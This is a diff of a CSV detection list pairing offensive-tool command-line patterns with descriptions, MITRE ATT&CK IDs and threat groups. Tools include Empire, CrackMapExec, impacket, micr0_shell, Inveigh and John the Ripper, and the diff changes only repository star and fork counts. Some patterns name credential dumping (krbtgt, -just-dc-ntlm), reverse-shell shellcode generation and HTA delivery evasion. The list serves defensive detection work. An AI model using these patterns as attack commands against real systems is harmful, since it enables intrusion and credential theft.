","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* invoke admin-service -q *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* invoke admin-service -q *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* invoke query *FROM SMS_Admin*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" -"* invoke_sessiongopher*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* invoke_vnc*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* invoke_sessiongopher*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* invoke_vnc*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* --ip * --port * --type cmd --language *","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" -"* -ip * -smb2support *lwpshare* ","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -ip * -smb2support *lwpshare* ","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* -IP * -SpooferIP * -HTTP N*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "* --ip * --variable shellcode *","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" "* ip-forwarding.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1040,49 +1040,49 @@ "* iscsi-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* isns-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --isroca --publickey *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* -it bloodhound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"* -it bloodhound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "* jdwp-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* jdwp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* jdwp-inject.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* jdwp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -JMXConsole -AppName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* john_done*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_fork*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_load*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_load_conf*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_load_conf_db*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_log_format*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_log_format2*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_mpi_wait*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_omp_fallback*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_omp_init*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_omp_maybe_adjust_or_fallback*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_omp_show_info*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_register_all*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_register_one*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_run*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_set_mpi*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_set_tristates*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_wait*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* JohnTheRipper/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* -JMXConsole -AppName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* john_done*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_fork*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_load*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_load_conf*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_load_conf_db*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_log_format*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_log_format2*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_mpi_wait*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_omp_fallback*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_omp_init*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_omp_maybe_adjust_or_fallback*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_omp_show_info*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_register_all*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_register_one*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_run*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_set_mpi*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_set_tristates*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_wait*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* JohnTheRipper/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* JspShell ua*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" -"* -just-dc-ntlm *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* -just-dc-user *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -just-dc-ntlm *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -just-dc-user *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "* -just-dc-user 'krbtgt' -dc-ip * -k -no-pass @*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* -k * -c *.exe* -p Outlook.Application -o *.hta*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use 